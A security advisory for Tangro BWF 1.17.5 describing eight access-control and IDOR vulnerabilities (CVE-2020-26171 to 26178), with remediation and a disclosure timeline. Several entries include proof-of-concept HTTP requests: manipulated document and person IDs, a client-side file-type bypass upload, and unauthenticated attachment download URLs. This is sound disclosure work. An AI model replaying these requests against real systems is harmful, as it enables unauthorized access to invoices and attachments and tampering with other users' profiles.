Advisory: Tangro BWF 1.17.5 Multiple Vulnerabilities

Tangro BWF 1.17.5 ist anfällig für mehrere Sicherheitslücken, die unter anderem durch eine fehlerhafte Zugriffskontrolle und unsichere direkte Objektreferenzierung (IDOR) ausgelöst werden:
  • Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
  • JWT without Expiration (CVE-2020-26172)
  • Unauthenticated PDF Download (CVE-2020-26173)
  • Upload Filetype Constraint Bypass (CVE-2020-26174)
  • Profile Attributes of Other Users Writable (CVE-2020-26175)
  • Unauthorised Listing of Attachments (CVE-2020-26176)
  • Editing Disabled Profile Attributes (CVE-2020-26177)
  • Unauthenticated Download of Workitem Attachments (CVE-2020-26178)

Detailed Security Advisories

Adding Attachments to Arbitrary Workitem (CVE-2020-26171)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26171
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The "documentId" of attachment uploads to "/api/document/attachments/upload" can be manipulated. By doing this, users can add attachments to workitems that do not belong to them.

### Proof of Concept

When uploading an attachment to a document, the upload request specifies a document ID:

````
POST /api/document/attachments/upload HTTP/1.1
Host: <Tangro Host>
Content-Length: 410
X-AUTH-TOKEN: "<TOKEN>"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylayr7DbpEgYZ2lrs

------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="documentId"

100000000000123456
------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

test

------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV
------WebKitFormBoundarylayr7DbpEgYZ2lrs--
````

By manipulating the documentID, the file will be added to the document that has been specified.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

JWT without Expiration (CVE-2020-26172)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Session Fixation
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N (Score 4.2)
CWE Reference: CWE-294
CVE Reference: CVE-2020-26172
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Every login in Tangro generates the same JWT token, which allows an attacker to reuse the token when a session is active. The JWT token does not contain an expiration timestamp which enables an attacker to bypass the authentication using capture-replay.

### Proof of Concept

```
Headers = { "typ" : "JWT", "alg" : "HS256" }

Payload = {
"lastName" : "<LastName>",
"firstName" : "<FirstName>", 
"isSapUser" : false, 
"person" : "1234", 
"validPassword" : true, 
"fullName" : "<FullName>", 
"language" : "DE", 
"username" : "<Username>"
}

Signature = "<Signature>"
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthenticated PDF Download (CVE-2020-26173)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:N/A:N (Score 2.6)
CVSSv3 Severity: AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 3.1)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26173
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

PDF files of invoices are served over the "/api/pdf/<documentID>" API endpoint and secured using an additional token:

https://<Tangro Hosts>/api/pdf/00000000000000123456?token=<Token>

While requiring the token prevents access to the PDF files without knowing its corresponding token, the API endpoint does not verify if the user requesting the document is logged in.

As a result, knowing the document’s ID and token it is possible to download the PDF without logging in.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Upload Filetype Constraint Bypass (CVE-2020-26174)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Upload Filetype Constraint Bypass
CVSSv2 Severity: AV:N/AC:L/Au:S/C:C/I:C/A:C (Score 9.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Score 8.8)
CWE Reference: CWE-434
CVE Reference: CVE-2020-26174
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The Tangro application requests a list of allowed filetypes from the server and restricts uploads to the filetypes contained in this list. However, this restriction is enforced in the browser (client-side) and can easily be circumvented. This allows an attacker to upload any file as an attachment to a workitem. In a worst­case scenario, this vulnerability could lead to remote code execution.

### Proof of Concept

Request:

```
POST /api/document/attachments/upload HTTP/1.1 
Host: <Tangro Host> 
X-AUTH-TOKEN: "<Token>" 
Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundarynhbkhkaxOGRUpaZa

------WebKitFormBoundarynhbkhkaxOGRUpaZa 
Content-Disposition: form-data; name="documentId"

100000000000123456 
------WebKitFormBoundarynhbkhkaxOGRUpaZa 
Content-Disposition: form-data; name="file"; filename="unsupportedfiletype.thinking" 
Content-Type: text/plain

The content of the file. 
------WebKitFormBoundarynhbkhkaxOGRUpaZa 
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV 
------WebKitFormBoundarynhbkhkaxOGRUpaZa--
```

Server response:

```
HTTP/1.1 200 OK
Pragma: no-cache 
Expires: -1 
Content-Type: text/plain; charset=utf-8 Cache-Control: no-cache 
Connection: close 
Date: Thu, 17 Sep 2020 09:38:48 GMT

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Profile Attributes of Other Users Writable (CVE-2020-26175)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:C/A:N (Score 6.8)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N (Score 6.5)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26175
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The value of "PERSON" in requests to /api/profile can be manipulated in order to change profile information of other users.

### Proof of Concept

```
POST /api/profile HTTP/1.1 
Host: <Tangro Host>

-- SNIP --
{ 
    "DESCRIPTION":"", 
    "ADDRESS_NAME1":"<Name>",
-- SNIP --
"PERSON":"1234", # By manipulating this ID, it is possible to change the profile information of other users.
"BIRTHDAY":"0000-00-00", "MANDT":"XXX"
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthorised Listing of Attachments (CVE-2020-26176)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:P/I:N/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26176
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

No or broken access control checks exist on the "/api/document/<DocumentID>/attachments" API endpoint.

Knowing a document ID, it is possible to list all the attachments of a workitem, including their respective IDs. This allows an attacker to gather valid attachment IDs for workitems that do not belong to them.

### Proof of Concept

Request:

```
GET /api/document/<DocumentID>/attachments HTTP/1.0 
Host: <Tangro Host>
X-AUTH-TOKEN: "<Token>"
```

Response:

```
HTTP/1.0 200 OK 
Content-Type: application/json; charset=utf-8 
Date: Thu, 17 Sep 2020 11:00:33 GMT

[{"archiveDocumentId":"<AttachmentID>","archiveId":"D1","archiveObject":"/SSC/PDF","creationDate":1594764000000,"name":"","sapBusinessObject":"<SAP ID>","user":""}]
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Editing Disabled Profile Attributes (CVE-2020-26177)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26177
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

A user’s profile contains some items that are greyed out and thus are not intended to be edited by regular users. However, this restriction is only applied client­-side.
Manipulating any of the greyed out values in requests to "/api/profile" is not prohibited server-side.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthenticated Download of Workitem Attachments (CVE-2020-26178)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:N/A:N (Score 5.0)
CVSSv3 Severity: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (Score 5.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26178
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Knowing an attachment ID, it is possible to download workitem attachments without being authenticated.

### Proof of Concept

https://<Tangro Host>/api/document/attachment/<AttachmentID>?archiveName=D1&fileType=/SSC/PDF

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Disclosure Timeline

2020-09-17: Vulnerability discovered
2020-10-01: Vulnerability reported to vendor
2020-10-01: Vendor responded immediately
2020-10-21: Vulnerability fix implemented, software update enters QA
2020-11-04: Vulnerability fixed, software update 1.18.1 released
2020-12-17: Vulnerability disclosed

References

[1] Advisory URL: https://blog.to.com/advisory-tangro-bwf-1-17-5-multiple-vulnerabilities
[2] Tangro Website: https://www.tangro.de/

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on https://blog.to.com.

Copyright: Creative Commons – Attribution (by) – Version 3.0

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

CAPTCHA *